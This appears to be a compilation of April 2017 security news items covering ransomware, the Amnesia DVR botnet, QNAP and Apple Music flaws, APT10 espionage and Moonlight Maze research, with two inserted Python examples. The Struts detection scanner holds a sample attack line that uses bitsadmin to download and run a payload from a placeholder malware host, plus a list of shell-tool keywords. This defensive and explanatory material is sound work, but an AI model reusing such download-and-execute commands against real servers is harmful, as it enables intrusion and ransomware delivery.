Once the ransomware has infected the system, it contacts the C&C server and sends various details about the target machine, including operating system, username, country, and system language. The C&C server responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.
The Philadelphia ransomware uses AES-256 to encrypt the files; when the operation is completed, it displays a demand for a ransom of 0.3 Bitcoins to the victim.
The analysis of the malicious code revealed a couple of interesting things:
the encrypted JavaScript contained a string “hospitalspam” in its directory path.
the ransomware C&C also contained “hospital/spam” in its path.
The presence of the words suggests the attackers are specifically targeting hospitals using spear phishing emails.
“Ransomware-as-a-service (RaaS) platforms such as Philadelphia continue to attract would-be cybercriminals to take part in the ransomware business” concluded Forcepoint. “Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector,”
IoT Amnesia Botnet puts at risk hundreds of thousands of DVRs due to unpatched flaw
7.4.2017 securityaffairs IoT
Security experts at Palo Alto Networks have discovered a new Linux/IoT botnet dubbed Amnesia botnet that has been targeting digital video recorders (DVRs).
Amnesia exploited an unpatched remote code execution vulnerability that was disclosed more than one year ago by security researcher Rotem Kerner.
“fraudsters are adopting new tactics in order to attack retailers. This new attack vector is to compromise DVR boxes, which is the heart component of any CCTV system. This was allowing them to achieve two goals at once-
Verify a targeted host actually belongs to a retailer.
Get a foothold inside the local network, one step closer to the POS station.” wrote Kerner.
Kerner reported the flaw in March 2016, but after a year opted to publicly reveal his discovery because the vendor ignored him.
According to Palo Alto Networks, Amnesia is a variant of the Tsunami botnet, a downloader/IRC bot backdoor used in the criminal ecosystem to launch DDoS attacks. The Amnesia botnet targets embedded systems, particularly DVRs manufactured by the Chinese company TVT Digital, which are currently sold under more than 70 brands worldwide.
The security vulnerability discovered by the researcher is still unpatched and, according to the results of an Internet scan conducted by Palo Alto Networks, there are roughly 227,000 vulnerable DVR devices worldwide.
“Based on our scan data shown below in Figure 1, this vulnerability affects approximately 227,000 devices around the world with Taiwan, the United States, Israel, Turkey, and India being the most exposed.” states the analysis published by PaloAlto Networks.
The Amnesia botnet was built exploiting the remote code execution vulnerability that allowed the attackers to take complete control of the devices.
A different analysis conducted with the Censys search engine revealed more than 700,000 IP addresses.
“Additionally, by using the fingerprint of “Cross Web Server”, we discovered over 227,000 devices exposed on Internet that are likely produced by TVT Digital. We also searched the keyword on Shodan.io and on Censys.io. They reported about 50,000 and about 705,000 IP addresses respectively.” states PaloAlto Networks.
1. Taiwan 47170
2. United States 44179
3. Israel 23355
4. Turkey 11780
5. India 9796
6. Malaysia 9178
7. Mexico 7868
8. Italy 7439
9. Vietnam 6736
10. United Kingdom 4402
11. Russia 3571
12. Hungary 3529
13. France 3165
14. Bulgaria 3040
15. Romania 2783
16. Colombia 2616
17. Egypt 2541
18. Canada 2491
19. Iran 1965
20. Argentina 1748
Experts believe the Amnesia malware is the first Linux malware to adopt virtual machine evasion techniques to elude malware analysis sandboxes.
“Virtual machine evasion techniques are more commonly associated with Microsoft Windows and Google Android malware. Similar to those, Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system.” continues the analysis. “This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.”
Experts at Palo Alto Networks believe the Amnesia botnet has the potential to become one of the major botnets in the threat landscape and could be used for large-scale attacks.
For further information on Amnesia, take a look at the technical report, which also includes IoCs.
Critical Vulnerabilities Patched in QNAP Storage Devices
7.4.2017 securityweek Vulnerability
QNAP recently patched roughly 20 vulnerabilities in its network-attached storage (NAS) products, including weaknesses that can be exploited to take control of affected devices.
According to an advisory published by the vendor last month, the flaws were patched with the release of version 4.2.4 build 20170313 of QTS, the operating system running on QNAP NAS devices.
The update patches privilege escalation, command injection, SQL injection, cross-site scripting (XSS), clickjacking, credentials management, access bypass and various memory corruption vulnerabilities.
Three of the command injection flaws were reported to QNAP by Harry Sintonen of F-Secure, who on Thursday published an advisory detailing his findings. The expert said he informed the vendor of the vulnerabilities in late February.
The security holes discovered by Sintonen, tracked as CVE-2017-6361, CVE-2017-6360 and CVE-2017-6359, can be exploited by authenticated or unauthenticated attackers to execute arbitrary commands on vulnerable devices. Exploitation of the unauthenticated command injection flaws can be automated in attacks aimed at devices that are connected to the Internet.
According to Sintonen, the flaws allow an attacker to gain root access to a device and read or modify all the data stored on it.
Researchers Pasquale Fiorillo and Guido Oricchio also published an advisory detailing a privilege escalation vulnerability (CVE-2017-5227) that was patched with the release of QTS 4.2.4.
The experts discovered that a local user can access a configuration file that contains a poorly encrypted Windows domain administrator password. The password is stored in the configuration file if the NAS device has joined an Active Directory domain, researchers said.
A couple of researchers from Salesforce have also been credited for finding security holes patched in QTS 4.2.4. The flaws found by Fiorillo, Oricchio and Sintonen are the only ones that have been assigned CVE identifiers.
It’s important that users install the update as soon as possible since malware that specifically targets QNAP devices is not unheard of. A few years ago, researchers warned that a worm had been exploiting the ShellShock vulnerability to plant backdoors on NAS devices from QNAP.
China-Linked Hackers Target U.S. Trade Group
7.4.2017 securityweek Cyber
A threat actor linked to China hijacked the website of a prominent U.S. trade association in an effort to deliver reconnaissance malware to individuals who accessed certain web pages.
Fidelis Cybersecurity published a report detailing the campaign on Thursday, just hours before a meeting between U.S. President Donald Trump and his Chinese counterpart, Xi Jinping.
The company noticed in late February that the website of the National Foreign Trade Council (NFTC) had been hacked and set up to serve malware in what is known as a watering hole attack, or a strategic web compromise. Experts believe the attack ended by March 2, when links injected into the NFTC website had been removed.
Evidence uncovered by investigators led them to believe that the attack was conducted by a China-linked cyber espionage group known as APT10, MenuPass and Stone Panda. Fidelis has dubbed the campaign Operation TradeSecret.
According to researchers, the hackers set up certain web pages of the NFTC website to serve a reconnaissance framework known as Scanbox. The tool has been used for several years, including in attacks aimed at U.S. organizations and the Uyghur population in China.
Scanbox has various plugins that allow attackers to collect information about the infected system and the software installed on it, and log keystrokes from the web browser. The harvested data can then be used to launch further attacks against the targeted individuals.
In the case of the NFTC, whose board of directors includes some of the largest private sector companies in the United States, APT10 targeted only specific web pages. One of them was a registration page for a board of directors meeting, which suggests that people or organizations expected to attend the meeting had been targeted.
“All organizations that have representatives on the board of directors of the NFTC -- or those who would have a reason to visit the site -- should investigate potentially impacted hosts using indicators provided in this report,” warned Fidelis. “Since the reconnaissance tool is typically used to enable future targeting campaigns, it should be assumed that targeted individuals will be subject to further attacks -- such as spearphishing campaigns.”
The security firm said it notified the lobbying group of the breach. SecurityWeek has reached out to NFTC for comment and will update this article if the organization responds.
Fidelis also reported seeing a similar campaign involving a fake website of Japan’s Ministry of Foreign Affairs. The APT10 attacks targeting Japan were also detailed in a report published this week by PwC UK and BAE Systems.
The research conducted by the two companies focused on attacks launched by APT10 against managed service providers (MSPs) in at least fourteen countries.
European Parliament Slams Privacy Shield
7.4.2017 securityweek Privacy
The European Parliament on Thursday adopted a resolution (PDF) strongly criticizing the EU-US Privacy Shield. Privacy Shield is the mechanism jointly developed by the European Commission and the US government to replace the earlier Safe Harbor, struck down by the European Court of Justice in 2015. Its purpose is to allow the transfer of EU personal information from Europe to servers in the US.
European law requires that personal information can only be transferred to geographical locations with an equivalent or 'adequate' level of privacy protection. With very different attitudes towards privacy between the US and the EU, it is unlikely that US data protection will ever be considered adequate for EU data. Privacy Shield is designed to provide an agreement between individual US organizations and the EU that they will handle EU data in a manner acceptable to European standards.
Although Privacy Shield has been agreed between the EC and the US and is already in operation, it is not without its critics -- not the least of which is the European Parliament. The stakes are high. While this is not the only legal mechanism for the export of European data to the US, it is the primary one. Others include standard contractual clauses (SCCs); but SCCs are already being challenged by Max Schrems in the Irish High Court. Without an acceptable lawful mechanism, there can be no trade between the US and the EU.
It is generally considered that SCCs will eventually be declared unlawful. "There is the ongoing case in Ireland regarding Standard Contractual Clauses," European privacy consultant Alexander Hanff told SecurityWeek. "This is likely to reach the CJEU and be ruled on in a similar fashion to Safe Harbor which, although will not have a direct impact on Privacy Shield, quite clearly shows the result similar cases (including Binding Corporate Rules and Privacy Shield itself) are likely to achieve."
There is therefore a lot riding on the continuing legality of Privacy Shield. For the moment, this is not as immediately concerning as it may seem. "The EP resolution follows the statement earlier this week from the Commission indicating a review in the Fall," comments David Flint, a senior partner at the MacRoberts law firm. "At this stage, it is merely a reminder of all the matters that the Commission should take account of and noting the residual powers of national DPAs to ban transfers, whilst restating the EP's concerns."
Hanff agrees that there will be little immediate outcome from this resolution. "I am pretty sure that the Commission can ignore the motion and are likely to do so because frankly what other choice do they have at the moment -- if they agree to it, then they are basically accepting that they failed, and the Commission are really not that humble." Politically, he sees a rift in the current Commission between those focused on digital rights and those focused on the Digital Economy; with the latter in the ascendency.
This doesn't mean that there is not a problem. Individual national data protection authorities (DPAs) "do have the power to effectively shut down Privacy Shield by banning transfers based on it on the grounds that it does not meet adequacy requirements," continued Hanff. "They have not done so to date -- I suspect because they have been giving the Commission and the US Government a chance to fix it -- but it seems highly unlikely that that will ever happen."
Hanff notes that there is little actual progress on the Privacy Shield agreement from the US side. "When you consider there is still no Ombudsman and that the Privacy and Civil Liberties Oversight Board is reduced to a non-quorate position where only one of its five seats are currently occupied... even if you completely ignore the woeful inadequacies of the agreement, you cannot ignore that some of the major assurances of that agreement have quite simply not been met. I suspect it is only a matter of time now before one or more of the EU's DPAs makes a stand." The French authority, CNIL, has demonstrated that it would not be afraid to do so, with recent actions against both Google and Microsoft.
One further complication is a hardening of attitudes with the arrival of the Trump administration. "There is no detailed consideration of possible changes as a result of the new US administration, although that remains a significant concern," comments Flint. "The recent policy changes on net neutrality and ISP data sharing exacerbate the concern."
Hanff is more forthright. "One should also be asking questions with regards to the Trump administration and US Congress wiping out ISP privacy rules last week. One must understand that whereas many people focus on the transference of data to a third country when they discuss Privacy Shield (in the case of Privacy Shield, specifically the US) it is not just about the right to transfer; it stems from the right to process - so we must now consider whether a European Citizen visiting the US and using a US carrier for data and voice, have their rights undermined by these recent changes. The obvious answer is yes; however, how we deal with that is much less obvious."
The European Commission is caught in a modern Morton's Fork of its own making. It was instrumental in developing European data protection laws (for human rights reasons), but doesn't wish to abide by them (for economic reasons). Much will hinge on the EC-US talks in the Fall; but today's European Parliament resolution has indicated to the EC what it expects.
If there is no significant move by the US administration to satisfy European concerns, then a rapid legal challenge to the Privacy Shield can be expected. But it should also be noted that the national DPAs do not have to wait for a legal judgment before taking action. The Schrems case that brought down the original Safe Harbor also made it clear that DPAs cannot be bound by EC promulgations. They have, as Hanff notes, "the power to effectively shut down Privacy Shield by banning transfers based on it, on the grounds that it does not meet adequacy requirements."
IoT Botnet "Amnesia" Hijacks DVRs via Unpatched Flaw
7.4.2017 securityweek IoT
A new Linux/IoT botnet named “Amnesia” has been targeting digital video recorders (DVRs) by exploiting an unpatched remote code execution vulnerability disclosed more than one year ago.
The threat, believed to be a variant of the Tsunami botnet, has been analyzed in detail by researchers at Palo Alto Networks. The botnet targets embedded systems, particularly DVRs made by China-based TVT Digital, which are sold under more than 70 brands worldwide.
The vulnerability exploited by the Amnesia malware was disclosed in March 2016 by researcher Rotem Kerner. The expert decided to make his findings public after the vendor ignored his attempts to report the flaw.
The security hole likely remains unpatched and an Internet scan conducted by Palo Alto Networks shows that there are roughly 227,000 vulnerable DVRs in the United States, Taiwan, India, Israel, Turkey, Malaysia and many other countries. A different search carried out via the Censys.io project revealed more than 700,000 IP addresses.
Amnesia has exploited the remote code execution flaw to identify vulnerable DVRs and take complete control of the devices.
Several IoT botnets emerged over the past months, including the notorious Mirai and Remaiten, which also includes capabilities borrowed from Tsunami.
What makes Amnesia interesting is the fact that it has virtual machine (VM) evasion capabilities – experts say this is the first Linux malware that attempts to evade sandboxes.
It’s not uncommon for Windows and Android malware to evade VMs, but such evasion techniques have not been seen in Linux malware.
“Amnesia tries to detect whether it’s running in a VirtualBox, VMware or QEMU based virtual machine, and if it detects those environments it will wipe the virtualized Linux system by deleting all the files in file system,” explained Palo Alto Networks researchers. “This affects not only Linux malware analysis sandboxes but also some QEMU based Linux servers on VPS or on public cloud.”
While Amnesia has yet to be used for large-scale attacks, experts believe it does have the potential to become a major botnet that can cause significant damage.
Flaw in Apple Music for Android Exposes User Data
7.4.2017 securityweek Apple
An update released this week by Apple for the Apple Music application for Android addresses a certificate validation issue that can be exploited to intercept potentially sensitive data.
In addition to a new design and new features, version 2.0 of Apple Music for Android, which according to Google Play has between 10 and 50 million installs, patches a vulnerability that can allow a man-in-the-middle (MitM) attacker to obtain user information.
The vulnerability, tracked as CVE-2017-2387, was reported to Apple by David Coomber of Info-Sec.CA back in August 2016. At the time, the researcher determined that the flaw had affected Apple Music 1.2.1 and earlier versions of the Android app.
In an advisory published this week, Coomber said he asked Apple for a status update in January, and the company said it had still been working on addressing the security hole.
The problem, according to the researcher, was that the app did not validate the SSL certificates received when connecting to the login and payment servers.
“An attacker who can perform a man in the middle attack may present bogus SSL certificates which the application will accept silently,” Coomber explained in his advisory. “Sensitive information could be captured by an attacker without the user's knowledge.”
It’s worth noting that this appears to be the first security advisory released by Apple for the Music app. The Android application was introduced in November 2015.
Americans want to extend the ban on laptops on board aircraft
7.4.2017 SecurityWorld Security
The ban on bringing laptops on board aircraft will continue and may soon affect more airports.
The Americans may extend their recent ban on bringing laptops and other electronics on board aircraft. Since last month it has applied to ten airports in predominantly Muslim countries.
"It may not take that long before we extend these measures," John Kelly, Secretary of the National Security Council, told Congress.
The ban prohibits passengers from the affected airports from bringing on board any electronic device larger than a mobile phone; such devices must be carried in the hold. The US government cites reducing the risk of a terrorist attack as the reason for the measure. According to intelligence services, terrorists from ISIS and other groups are developing bombs that can be built into electronic devices in a way that fools airport security. Kelly gave no specifics about these technologies, but assured that the terrorist threat is "real".
"There are dozens of groups that are considering an attack on the aviation industry." After the US, Great Britain has adopted a similar ban; Canada is another country currently considering the step.
Critics, however, ask why the ban applies only to some countries. They also point to the differing levels of security at individual airports. Those in the United States, for example, are equipped with far more advanced X-ray systems than elsewhere in the world.
Everyone agrees, however, that an explosive device in a laptop placed in the hold can be harder to detonate and, from that location, theoretically reduces the amount of damage done.
"On board, he can place it and detonate it wherever he wants," says Jeffrey Price, an aviation security expert at a Denver university. Despite the government's planned extension and the ban lasting until "the threat passes", Price believes such a ban cannot last forever and the countries it applies to should be able to resolve the situation differently.
For instance, by modernizing and generally improving their security measures at the airports themselves.
Apache Struts 2 vulnerability exploited to deliver the Cerber ransomware
7.4.2017 securityaffairs Virus
Cyber criminals exploited the recently patched Apache Struts 2 vulnerability CVE-2017-5638 in the wild to deliver the Cerber ransomware.
A recently patched Apache Struts 2 vulnerability, tracked as CVE-2017-5638, has been exploited by crooks in the wild to deliver the Cerber ransomware.
The remote code execution vulnerability affected the Jakarta-based file upload Multipart parser under Apache Struts 2. The CVE-2017-5638 flaw was documented in Rapid7’s Metasploit Framework GitHub site and researchers at Cisco Talos discovered that attackers in the wild are exploiting a publicly available PoC code that triggers the issue.
The attackers targeted both Unix and Windows systems to establish backdoors or to infect the systems with a DDoS trojan. The recent campaign spotted by researchers at F5 Networks targeted Windows machines.
Since March 20, the experts observed attacks delivering Cerber ransomware to Windows servers.
“This campaign started on the 10th of March, 2017 a couple of days after the vulnerability was disclosed. While it looked similar to the other CVE-2017-5638 campaigns, the attack vector seemed to be a slight modification of the original public exploit.” reads the blog post published by F5 Networks.
“The exploit triggers the vulnerability via the Content-Type header value, which the attacker customized with shell commands to be executed if the server is vulnerable.”
“For about a month, we have been tracking numerous attempts to exploit the Java Struts2 vulnerability (CVE 2017-5638). Typically, the exploits targeted Unix systems with simple Perl backdoors and bots.” states an analysis published by experts at the SANS Technology Institute. “But recently, I saw a number of exploit attempts targeting Windows systems using a variant of the Cerber ransomware.”
Crooks exploited the CVE-2017-5638 vulnerability to run shell commands and Windows tools such as BITSAdmin in order to download and execute the Cerber malware.
Below is the attack sequence observed by the researchers at the SANS Institute:
The script uses BITSAdmin to download the malware (I obfuscated the URL above).
The malware (“UnInstall.exe”) is saved in the %TEMP% directory.
Finally, the malware is executed.
The experts at F5 Networks analyzed the Bitcoin address where victims are told to send the ransom payment and found that it had received 84 bitcoins, roughly $100,000 at the current market value.
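As an added defensive illustration (not code from F5, SANS or the page), the following scanner flags requests whose Content-Type header carries the shape of the CVE-2017-5638 attack vector described above: OGNL expression delimiters instead of a MIME type, and the BITSAdmin/%TEMP% download chain. The log format and all sample lines are constructed for this example; the payloads are placeholders, not working exploits.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Assumed log format for the constructed sample below (not any real server's format):
#   METHOD PATH "CONTENT-TYPE-HEADER-VALUE" STATUS
LOG_RE = re.compile(r'^(?P<method>\S+) (?P<path>\S+) "(?P<ctype>[^"]*)" (?P<status>\d{3})$')

# A well-formed Content-Type is "type/subtype" optionally followed by ";name=value" parameters.
VALID_CTYPE_RE = re.compile(r'^[\w.+-]+/[\w.+-]+(\s*;\s*[\w-]+=("[^"]*"|[^;\s]*))*$')

# OGNL expression delimiters: a legitimate Content-Type value never contains them.
OGNL_MARKERS = ("%{", "${")

# Post-exploitation strings from the Cerber delivery chain reported on the page
# (BITSAdmin download into %TEMP%), plus a few generic download/shell helpers.
PAYLOAD_HINTS = ("bitsadmin", "%temp%", "cmd.exe", "powershell", "/bin/sh", "wget ", "curl ")

# Constructed sample request log; line 3 and line 5 mimic the attack shape with placeholders.
SAMPLE_REQUESTS = [
    'POST /struts2-showcase/upload.action "multipart/form-data; boundary=----WebKitFormBoundaryA1b2" 200',
    'GET /index.action "" 200',
    r'POST /index.action "%{CONSTRUCTED_OGNL_PLACEHOLDER bitsadmin /transfer j http://MALWARE-HOST-PLACEHOLDER/UnInstall.exe %TEMP%\UnInstall.exe}" 500',
    'POST /upload.action "application/json; charset=utf-8" 200',
    'POST /index.action "%25%7BCONSTRUCTED_ENCODED_PLACEHOLDER%7D" 500',
    'this line is not in the expected format and is skipped',
]


def inspect_content_type(ctype: str) -> List[str]:
    """Return the reasons a Content-Type value looks like CVE-2017-5638 abuse (empty list if clean)."""
    value = unquote(ctype).strip()  # one pass of percent-decoding catches simple URL-encoded markers
    if not value:
        return []  # no Content-Type at all (typical for GET) is not suspicious by itself
    reasons = []
    if any(marker in value for marker in OGNL_MARKERS):
        reasons.append("ognl_expression_marker")
    lowered = value.lower()
    reasons.extend(f"payload_hint:{hint.strip()}" for hint in PAYLOAD_HINTS if hint in lowered)
    if not VALID_CTYPE_RE.match(value):
        reasons.append("malformed_content_type")
    return reasons


def scan_log(lines: List[str]) -> List[Dict]:
    """Run inspect_content_type over every parsable line; one finding per suspicious request."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if m is None:
            continue  # unparsable line: skip rather than guess
        reasons = inspect_content_type(m["ctype"])
        if reasons:
            findings.append({"line": lineno, "path": m["path"], "status": m["status"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_REQUESTS):
        print(finding)
```

Because it matches the request shape rather than one payload string, the check also fires on the "slight modification of the original public exploit" F5 mentions; it is a detection aid for hunting, not a substitute for upgrading Struts.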
“The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers,” F5 said in a blog post. “Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.”
Operation Cloud Hopper – APT10 goes after Managed Service Providers
7.4.2017 securityaffairs APT
Security experts uncovered a widespread campaign tracked as Operation Cloud Hopper known to be targeting managed service providers (MSPs) worldwide. Chinese APT10 group is the main suspect.
Security experts from PwC UK and BAE Systems have uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide. The experts attributed the operation to the Chinese APT group known as APT10.
The experts gathered evidence suggesting the involvement of the APT10 group, and domain registration timing indicates the operation was conducted from China’s time zone.
The attackers used the same malware seen in other attacks attributed to APT10; the Poison Ivy RAT and PlugX are the most popular malicious codes in the crew’s arsenal. Experts noticed that from around mid-2016 the group started once again to use PlugX, along with ChChes, Quasar and RedLeaves.
“APT10 has significantly increased its scale and capability since early 2016, including the addition of new custom tools. APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report, which comprehensively detailed the malware’s functionality and features, and its use by several China-based threat actors, including APT10.” reads the report published by the security firms. “APT10 primarily used PlugX malware from 2014 to 2016, progressively improving and deploying newer versions, while simultaneously standardizing their command and control function.”
The Operation Cloud Hopper campaign leveraged well-researched spear-phishing messages aimed at compromising MSPs.
The hackers used this tactic to obtain legitimate credentials to access the client networks of MSPs and exfiltrate sensitive data.
The attackers aimed to compromise the supply chain to steal intellectual property from the victims.
“Other threat actors have previously been observed using a similar method of a supply chain attack, for example, in the compromise of Dutch certificate authority DigiNotar in 2016 and the compromise of US retailer Target in 2013” continues the report. “We believe that the observed targeting of MSPs is part of a widescale supply-chain attack.”
Operation Cloud Hopper demonstrates that APT10 focuses on cyber espionage, targeting intellectual property. The authors of the report confirmed that APT10 has exfiltrated a high volume of data from multiple victims by exploiting compromised MSP networks.
Penquin’s Moonlit Maze
6.4.2017 Kaspersky CyberSpy
Back to the Future – SAS 2016
As Thomas Rid left the SAS 2016 stage, he left us with a claim that turned the heads of the elite researchers who filled the detective-themed Tenerife conference hall. His investigation had turned up multiple sources involved in the original investigation into the historic Moonlight Maze cyberespionage campaign who claimed that the threat actor had evolved into the modern day Turla. What would this all mean?
The Titans of Old
Moonlight Maze is the stuff of cyberespionage legend. In 1996, in the infancy of the Internet, someone was rummaging through military, research, and university networks primarily in the United States, stealing sensitive information on a massive scale. Victims included the Pentagon, NASA, and the Department of Energy, to name a very limited few. The scale of the theft was literally monumental, as investigators claimed that a printout of the stolen materials would stand three times taller than the Washington Monument.
To say that this historic threat actor is directly related to the modern day Turla would elevate an already formidable attacker to another league altogether. Turla is a prolific Russian-speaking group known for covert exfiltration tactics such as hijacked satellite connections, waterholing of government websites, covert-channel backdoors, rootkits, and deception. Its presumed origins track back to the famous Agent.BTZ, a campaign that spread through military networks via USB keys and took formidable cooperation to purge (the interagency operation codenamed Buckshot Yankee in 2008). Though mitigating the threat got the most attention at the time, later research connected this toolkit directly to the modern Turla.
Further confirmation came through our own Kurt Baumgartner's research for Virus Bulletin 2014, when he discovered Agent.BTZ samples that contacted a hijacked satellite IP jumping point, the same one Turla used later on. This advanced exfiltration technique is classic Turla and cemented the belief that the Agent.BTZ actor and Turla were one and the same. That would place Turla's activity back as early as 2006-2007, but that is still a decade after the Moonlight Maze attacks.
By 2016 the Internet was overcrowded with well-resourced cyberespionage crews, but twenty years ago there were few players in this game and few paid attention to cyberespionage. In retrospect, we know that the Equation Group was probably active at this time: a command-and-control registration places Equation in the mid-1990s, which makes Equation the longest-running cyberespionage group/toolkit in history. To then claim that Turla, in one form or another, was active for nearly as long would place it in a league beyond even its prehistoric counterpart as a pioneer of state-sponsored cyberespionage.
A Working Hypothesis
By the time of the SAS 2016 presentation, we had already discussed at length how one might go about proving this link. The revelation that the Moonlight Maze attacks depended on a Solaris/*NIX toolkit, not a Windows one as is the case with most of Turla, actually revived our hopes: we would not have to look for older Windows samples, of which there were none so far, but could instead focus on another discovery. In 2014, Kaspersky announced the discovery of Penquin Turla, a Linux backdoor leveraged by Turla in specific attacks. We turned our attention once again to the rare Penquin samples and noticed something interesting: the code was compiled for Linux kernel versions 2.2.0 and 2.2.5, released in 1999. Moreover, the statically linked libpcap and OpenSSL libraries corresponded to versions released in the early 2000s. Finally, despite the original assessment incorrectly surmising that Penquin Turla was based on cd00r (an open-source backdoor by fx), it was actually based on LOKI2, another open-source backdoor for covert exfiltration written by Alhambra and daemon9 and released in Phrack in the late 1990s. This all added up to an extremely unusual set of circumstances for malware leveraged in attacks from 2011 to 2016, with the latest Penquin sample, discovered just a month ago, submitted from a system in Germany.
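The two dating clues used above (the kernel version a Linux binary was built for, and the versions of statically linked libpcap/OpenSSL) can both be read straight out of an ELF file. The script below is an added example, not code from Kaspersky or the whitepaper: it parses the GNU .note.ABI-tag note, whose descriptor records the minimum kernel version (OS id, major, minor, patch), and scans the file image for the version banners that static libpcap, OpenSSL and GCC builds leave behind. The note bytes and the file image are constructed in-script; on a real sample you would feed it the .note.ABI-tag section (readelf -n lists it) and the whole file. The banner regexes are this example's own and only cover the three libraries named here.

```python
"""
Added example (not from the Kaspersky whitepaper): pull compile-era clues out of a
static Linux ELF.  Source 1: the GNU .note.ABI-tag note (minimum kernel the binary was
built for).  Source 2: version banners that static libpcap/OpenSSL/GCC builds embed.
All input bytes below are constructed for the demo.
"""
import re
import struct

NT_GNU_ABI_TAG = 1
ABI_OS_NAMES = {0: "Linux", 1: "GNU/Hurd", 2: "Solaris", 3: "FreeBSD"}


def parse_elf_notes(blob, little_endian=True):
    """Yield (name, type, desc) from raw ELF note bytes.  The layout is the same for
    ELF32 and ELF64: three 4-byte words (namesz, descsz, type), then name and desc,
    each padded to a 4-byte boundary.  namesz includes the terminating NUL."""
    word = "<III" if little_endian else ">III"
    off = 0
    while off + 12 <= len(blob):
        namesz, descsz, ntype = struct.unpack_from(word, blob, off)
        off += 12
        name = blob[off:off + namesz].rstrip(b"\0").decode("ascii", "replace")
        off += (namesz + 3) & ~3
        desc = blob[off:off + descsz]
        off += (descsz + 3) & ~3
        yield name, ntype, desc


def abi_tag_min_kernel(blob, little_endian=True):
    """Return e.g. 'Linux 2.2.5' from a GNU ABI-tag note, or None if there is none.
    desc holds four words in the file's byte order: OS id, major, minor, patch."""
    word = "<IIII" if little_endian else ">IIII"
    for name, ntype, desc in parse_elf_notes(blob, little_endian):
        if name == "GNU" and ntype == NT_GNU_ABI_TAG and len(desc) >= 16:
            os_id, major, minor, patch = struct.unpack_from(word, desc, 0)
            os_name = ABI_OS_NAMES.get(os_id, "os%d" % os_id)
            return "%s %d.%d.%d" % (os_name, major, minor, patch)
    return None


# Banners that statically linked libraries and the compiler embed verbatim (example's own list).
VERSION_PATTERNS = [
    re.compile(rb"OpenSSL \d+\.\d+\.\d+[a-z]?(?: \d{1,2} [A-Za-z]{3} \d{4})?"),
    re.compile(rb"libpcap version \d+\.\d+(?:\.\d+)?"),
    re.compile(rb"GCC: \([^)]*\) \d+\.\d+(?:\.\d+)?"),
]


def find_version_strings(data):
    """Sorted, de-duplicated banner strings found anywhere in the file image."""
    found = set()
    for pat in VERSION_PATTERNS:
        for m in pat.finditer(data):
            found.add(m.group(0).decode("ascii", "replace"))
    return sorted(found)


def triage(note_bytes, file_bytes):
    """Combine both clues into one dict for the analyst."""
    return {"min_kernel": abi_tag_min_kernel(note_bytes),
            "banners": find_version_strings(file_bytes)}


# --- constructed sample input ---------------------------------------------------
def _note(name, ntype, desc):
    """Build one ELF note (little-endian) with correct namesz/descsz and padding."""
    name = name + b"\0"
    pad = lambda b: b + bytes((-len(b)) % 4)
    return struct.pack("<III", len(name), len(desc), ntype) + pad(name) + pad(desc)

# An odd-sized vendor note first, so the padding logic is exercised, then the ABI tag.
SAMPLE_NOTES = _note(b"Demo", 0x100, b"xyz") + \
               _note(b"GNU", NT_GNU_ABI_TAG, struct.pack("<IIII", 0, 2, 2, 5))

SAMPLE_FILE = (b"\x7fELF" + bytes(60)
               + b"\0OpenSSL 0.9.7d 17 Mar 2004\0"
               + b"\0libpcap version 0.7.1\0"
               + b"\0GCC: (GNU) 2.95.3 20010315 (release)\0")

if __name__ == "__main__":
    print(triage(SAMPLE_NOTES, SAMPLE_FILE))
```

The ABI tag only gives a lower bound (the kernel the toolchain targeted, not the date the attacker compiled), which is why the article pairs it with library banners: a binary carrying both a 2.2.x ABI tag and an OpenSSL banner from the early 2000s was, at the earliest, built then, regardless of when it was first seen in the wild.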
Kurt Baumgartner’s prescient observation upon the discovery of the first Penquin Turla samples
Our working hypothesis became this: “The Turla developers decided to dust down old code and recompile it for current Linux victims in the hope of getting a stealthier beachhead on systems that are less likely to be monitored.” Were that the case, Penquin Turla could be the modern link tying Turla to Moonlight Maze. But to prove our hypothesis and this historic evolution, we would need a glimpse at the original artefacts, something we had no access to.
The Cupboard Samples
Our last hope was that someone somewhere had kept a set of backups collecting dust in a cupboard that they might be willing to share. Thomas took to the road to follow up his sources and eventually stumbled upon something remarkable. The Moonlight Maze operators were early adopters of a certain degree of operational security, using a series of hacked servers as relays to mask their original location. During the later stages of their campaign, they hacked a Solaris box in the U.K. to use as a relay. Unbeknown to them, the system administrator—in cooperation with the Metropolitan Police in London and the FBI—turned the server against the malicious operators. The machine known as ‘HRTest’ would proceed to log everything the attackers did keystroke-by-keystroke and save each and every binary and archive that transited through it. This was a huge win for the original investigators and provided something close to a six-month window of visibility before the attackers ditched this relay site (curiously, as a result of the campaign’s first publicity in early March 1999). Finding these samples was hard and fortuitous—due to a redaction error in an FBI FOIA release, we were able to ultimately track down David Hedges after about a year of sleuthing. “I hear you’re looking for HRTest,” David said when he finally called Thomas for the first time. Then, the now-retired administrator kicked a machine under his desk, chuckling as he said “well it’s sitting right here, and it’s still working.”
Thomas Rid, David Hedges, Daniel Moore, and Juan Andres Guerrero-Saade at King’s College London
Paydirt but not the Motherlode
What we had in our hands allowed us to recreate a portion of the constellation of attacks that constitutes Moonlight Maze. The samples and logs became our obsession for months. While Juan Andres and Costin at GReAT reversed the binaries (most compiled for SPARC under Solaris and for MIPS under IRIX, architectures rarely seen in present-day malware analysis), Daniel Moore went so far as to build an entire UI to parse and load the logs into, so as to visualize the extent of the networks and nodes under attack. We set out to profile our attackers and understand their methods. Among these, some salient features emerged:
Moore’s Rapyd Graph Data Analyzer tracking the victims of Moonlight Maze linked to HRTest
